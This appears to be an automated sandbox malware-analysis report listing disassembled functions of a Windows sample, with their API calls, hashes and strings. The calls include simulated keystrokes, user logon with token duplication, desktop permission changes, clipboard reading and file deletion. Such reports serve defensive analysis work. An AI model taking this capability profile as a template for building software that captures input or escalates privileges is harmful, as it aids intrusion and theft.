                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 3429851547-4164748364
                                        • Opcode ID: ba48266aad0e2536eea387be2dfb767b255330d5d09a5facfc204e15d139a166
                                        • Instruction ID: 7e6a7fa465658e610ecd27201908381db82deeb8d667b454a600ef250d29df24
                                        • Opcode Fuzzy Hash: ba48266aad0e2536eea387be2dfb767b255330d5d09a5facfc204e15d139a166
                                        • Instruction Fuzzy Hash: A1427C70204601AFDB24EF24CC84FBABBF5FF49318F180619F669872A1E731A954DB59
                                        Function 00C84873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C848F3
                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C84908
                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C84927
                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C8494B
                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C8495C
                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C8497B
                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C849AE
                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C849D4
                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C84A0F
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C84A56
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C84A7E
                                        • IsMenu.USER32(?), ref: 00C84A97
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C84AF2
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C84B20
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C84B94
                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C84BE3
                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C84C82
                                        • wsprintfW.USER32 ref: 00C84CAE
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C84CC9
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C84CF1
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C84D13
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C84D33
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C84D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 4054740463-328681919
                                        • Opcode ID: a414eceec2966265ad263bbb2eb01fb0198388c478f6b1f31fda60dd3c4b6c4e
                                        • Instruction ID: 29b8b2b721b80bf6b32a8aa018cbd903ce5b5ef531b7e2260b19c009cb749047
                                        • Opcode Fuzzy Hash: a414eceec2966265ad263bbb2eb01fb0198388c478f6b1f31fda60dd3c4b6c4e
                                        • Instruction Fuzzy Hash: 10122331600256ABEB28AF64CC49FAE7BF8EF45318F10412DF525DB2E1DB749A41CB58
                                        Function 00C0F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C0F998
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4F474
                                        • IsIconic.USER32(00000000), ref: 00C4F47D
                                        • ShowWindow.USER32(00000000,00000009), ref: 00C4F48A
                                        • SetForegroundWindow.USER32(00000000), ref: 00C4F494
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4F4AA
                                        • GetCurrentThreadId.KERNEL32 ref: 00C4F4B1
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4F4BD
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4F4CE
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4F4D6
                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C4F4DE
                                        • SetForegroundWindow.USER32(00000000), ref: 00C4F4E1
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F4F6
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F501
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F50B
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F510
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F519
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F51E
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F528
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F52D
                                        • SetForegroundWindow.USER32(00000000), ref: 00C4F530
                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C4F557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: f4e60b18718f68c8cc10840eec8dbcb3146e4dcaf763ab960c8cda105ddd1e0b
                                        • Instruction ID: cf82da5bb30aaeb59ace782de957f145afe7e6dad6311b81a53beec6ef4f2557
                                        • Opcode Fuzzy Hash: f4e60b18718f68c8cc10840eec8dbcb3146e4dcaf763ab960c8cda105ddd1e0b
                                        • Instruction Fuzzy Hash: 67315471A40218BBEB206BB59C8AFBF7E6CFB44B50F100069F605E61D1D6B15D01AB74
                                        Function 00C51201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5170D
                                          • Part of subcall function 00C516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5173A
                                          • Part of subcall function 00C516C3: GetLastError.KERNEL32 ref: 00C5174A
                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C51286
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C512A8
                                        • CloseHandle.KERNEL32(?), ref: 00C512B9
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C512D1
                                        • GetProcessWindowStation.USER32 ref: 00C512EA
                                        • SetProcessWindowStation.USER32(00000000), ref: 00C512F4
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C51310
                                          • Part of subcall function 00C510BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C511FC), ref: 00C510D4
                                          • Part of subcall function 00C510BF: CloseHandle.KERNEL32(?,?,00C511FC), ref: 00C510E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                        • String ID: $default$winsta0
                                        • API String ID: 22674027-1027155976
                                        • Opcode ID: 113ba7e471ea6389ca8cdfb3373de14a86199ff86b6cd75318721141ae22a957
                                        • Instruction ID: 3403e6706a2317f356289a8b8abcbf70fe61db18aee30ad78a3fa24f7fa295f7
                                        • Opcode Fuzzy Hash: 113ba7e471ea6389ca8cdfb3373de14a86199ff86b6cd75318721141ae22a957
                                        • Instruction Fuzzy Hash: 0781A275900209AFDF119FA4DC89FEE7BB9EF04705F184129FD20B61A0D7748A89DB28
                                        Function 00C50B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51114
                                          • Part of subcall function 00C510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51120
                                          • Part of subcall function 00C510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C5112F
                                          • Part of subcall function 00C510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51136
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C5114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C50BCC
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C50C00
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50C17
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C50C51
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C50C6D
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50C84
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C50C8C
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C50C93
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C50CB4
                                        • CopySid.ADVAPI32(00000000), ref: 00C50CBB
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C50CEA
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C50D0C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C50D1E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50D45
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D4C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50D55
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D5C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50D65
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D6C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C50D78
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D7F
                                          • Part of subcall function 00C51193: GetProcessHeap.KERNEL32(00000008,00C50BB1,?,00000000,?,00C50BB1,?), ref: 00C511A1
                                          • Part of subcall function 00C51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C50BB1,?), ref: 00C511A8
                                          • Part of subcall function 00C51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C50BB1,?), ref: 00C511B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: d695f8f8ea0eb2bd5ac90a9de56dbf67af96f14a7d12969a9a0a4d584316c74f
                                        • Instruction ID: 18e0b04f58e6e1ee2bd3b207532f410f0d0c4f69994443d2de9c90ddea0e87fc
                                        • Opcode Fuzzy Hash: d695f8f8ea0eb2bd5ac90a9de56dbf67af96f14a7d12969a9a0a4d584316c74f
                                        • Instruction Fuzzy Hash: 96716C7590020AABDF109FE4DC88FEEBBB8BF05341F244519ED24E6191D771AA49CB74
                                        Function 00C6EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(00C8CC08), ref: 00C6EB29
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C6EB37
                                        • GetClipboardData.USER32(0000000D), ref: 00C6EB43
                                        • CloseClipboard.USER32 ref: 00C6EB4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00C6EB87
                                        • CloseClipboard.USER32 ref: 00C6EB91
                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C6EBBC
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00C6EBC9
                                        • GetClipboardData.USER32(00000001), ref: 00C6EBD1
                                        • GlobalLock.KERNEL32(00000000), ref: 00C6EBE2
                                        • GlobalUnlock.KERNEL32(00000000,?), ref: 00C6EC22
                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C6EC38
                                        • GetClipboardData.USER32(0000000F), ref: 00C6EC44
                                        • GlobalLock.KERNEL32(00000000), ref: 00C6EC55
                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C6EC77
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6EC94
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6ECD2
                                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00C6ECF3
                                        • CountClipboardFormats.USER32 ref: 00C6ED14
                                        • CloseClipboard.USER32 ref: 00C6ED59
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                        • String ID:
                                        • API String ID: 420908878-0
                                        • Opcode ID: a25a8986d2aaf813922dfce921096d4633c78127748f97e595909eb797c660fb
                                        • Instruction ID: 8817a4b8e01bde32e034465d6d3b2bbe7eda8b222e9ae3a039d248cf26abf035
                                        • Opcode Fuzzy Hash: a25a8986d2aaf813922dfce921096d4633c78127748f97e595909eb797c660fb
                                        • Instruction Fuzzy Hash: FD61DF38204205AFD320EF24D8C5F3A77E4AF84754F18456AF556972A2DB31DA09CB66
                                        Function 00C6698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C669BE
                                        • FindClose.KERNEL32(00000000), ref: 00C66A12
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C66A4E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C66A75
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C66AB2
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C66ADF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                        • API String ID: 3830820486-3289030164
                                        • Opcode ID: 5c6457b077596457bd8a6b46b0d86e5506e4b178c8f84454053711a0145aa170
                                        • Instruction ID: 12c4b94c39d4e3980ba13aa51cf6454cf8066f2669858241350b7fe1329f8a1a
                                        • Opcode Fuzzy Hash: 5c6457b077596457bd8a6b46b0d86e5506e4b178c8f84454053711a0145aa170
                                        • Instruction Fuzzy Hash: 40D15E72508304AFC710EBA4C991EBBB7ECAF88704F04495DF689C7191EB74DA48CB62
                                        Function 00C69642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C69663
                                        • GetFileAttributesW.KERNEL32(?), ref: 00C696A1
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00C696BB
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C696D3
                                        • FindClose.KERNEL32(00000000), ref: 00C696DE
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C696FA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6974A
                                        • SetCurrentDirectoryW.KERNEL32(00CB6B7C), ref: 00C69768
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C69772
                                        • FindClose.KERNEL32(00000000), ref: 00C6977F
                                        • FindClose.KERNEL32(00000000), ref: 00C6978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: 6b1aa87e3a7cfb3299c72ece0abc3f042c3632029b365edd8b15756a55b8467e
                                        • Instruction ID: 542c25ae1934183cfa9a16753eddbc9b8755e75eeaee234e86d2829aa14d0722
                                        • Opcode Fuzzy Hash: 6b1aa87e3a7cfb3299c72ece0abc3f042c3632029b365edd8b15756a55b8467e
                                        • Instruction Fuzzy Hash: 49319232541219ABDF24AFB4EC89BEE77ACDF49321F104165F815E21A0DB34DA849B64
                                        Function 00C6979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C697BE
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C69819
                                        • FindClose.KERNEL32(00000000), ref: 00C69824
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C69840
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C69890
                                        • SetCurrentDirectoryW.KERNEL32(00CB6B7C), ref: 00C698AE
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C698B8
                                        • FindClose.KERNEL32(00000000), ref: 00C698C5
                                        • FindClose.KERNEL32(00000000), ref: 00C698D5
                                          • Part of subcall function 00C5DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C5DB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 18d5439823612a44a8888abb81b15e86dd8becf886592d733194a58fe7739c79
                                        • Instruction ID: 972ef9a10980ca793a8fe7cbda04a68f5158bd3073e3f3852d76369edd5fc888
                                        • Opcode Fuzzy Hash: 18d5439823612a44a8888abb81b15e86dd8becf886592d733194a58fe7739c79
                                        • Instruction Fuzzy Hash: 6A31A332540619AADB24AFB4EC88ADE77BCDF4A320F144165E824A31E0DB34DA85DB64
                                        Function 00C68195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00C68257
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C68267
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C68273
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C68310
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68324
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68356
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C6838C
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        • Opcode ID: cf37e57b6c4f61f0c26e96a82fedafc0413c811ce61739488d52411729f62a6b
                                        • Instruction ID: 08fa1fab40c1b2ba9076bcc748b07626b849de4c8ccc8cef31cb46e5957e090f
                                        • Opcode Fuzzy Hash: cf37e57b6c4f61f0c26e96a82fedafc0413c811ce61739488d52411729f62a6b
                                        • Instruction Fuzzy Hash: D0616E715043059FCB20DF60C8909AEB3E8FF89310F04496DF999D7251DB35EA49CB92
                                        Function 00C5D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                          • Part of subcall function 00C5E199: GetFileAttributesW.KERNEL32(?,00C5CF95), ref: 00C5E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C5D122
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C5D1DD
                                        • MoveFileW.KERNEL32(?,?), ref: 00C5D1F0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5D20D
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5D237
                                          • Part of subcall function 00C5D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C5D21C,?,?), ref: 00C5D2B2
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 00C5D253
                                        • FindClose.KERNEL32(00000000), ref: 00C5D264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        • Opcode ID: a76305299df7397de36213d2cc12a71260997ae254c91b229802c7c973a85624
                                        • Instruction ID: bd3d5eb4a7248d2469df5fa2a9c8162a8c2cbb7960bd051f6f38936fdf86bde2
